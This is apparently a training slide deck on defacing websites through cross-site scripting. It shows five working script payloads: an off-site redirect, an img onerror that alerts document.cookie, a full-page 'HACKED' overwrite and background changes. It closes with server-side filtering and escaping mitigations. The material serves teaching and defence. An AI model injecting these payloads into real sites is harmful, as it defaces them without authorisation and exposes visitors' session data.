Cross Site Scripting - Web Defacement Techniques
Slide 1: Introduction
• Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things a hacker does after finding a vulnerability in a website.
• Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.

Slide 2: Testing
• The string "Test" will be entered into the input field and the request captured each time using OWASP's ZAP Proxy. Once the request is captured, we replace "Test" with our malicious code, which bypasses the client-side protections the web site has in place.

Slide 3: Technique 1
• Redirected to hacked image out of the App Domain
<script>window.location="http://www.theblacktechreport.com/wp content/uploads/2011/01/hacked.jpg";</script>

Slide 4: Technique 2
• Adds a hacked image to the page
<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>

Slide 5: Technique 3
• Cover full page with "Hacked" - in App Domain
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Slide 6: Technique 4
• Change background to RED - in App Domain
<script>document.body.bgColor="red";</script>

Slide 7: Technique 5
• Set the background to hacked image - in App Domain
<script>document.body.background="http://www.theblacktechreport.com/wpcontent/uploads/2011/01/hacked.jpg";</script>

Slide 8: Mitigation
1. Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of these characters are needed by the application, proper escaping is enough. A non-comprehensive list of characters likely to be part of an attack vector is:
   • <> (triangular parenthesis)
   • () (parenthesis)
   • " (quotation mark)
   • & (ampersand sign)
   • ' (single apostrophe)
   • + (plus sign)
   • % (percent sign)
   • = (equals sign)
   • : (colon)
   • ` (forward tick)
   • ; (semicolon)
   • ´ (back tick)
2. Escape all untrusted output before presenting it to the UI. Follow the rules detailed in the following link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
3. When possible, it is recommended to enforce a specific charset encoding (using the 'Content-Type' header or a <meta> tag).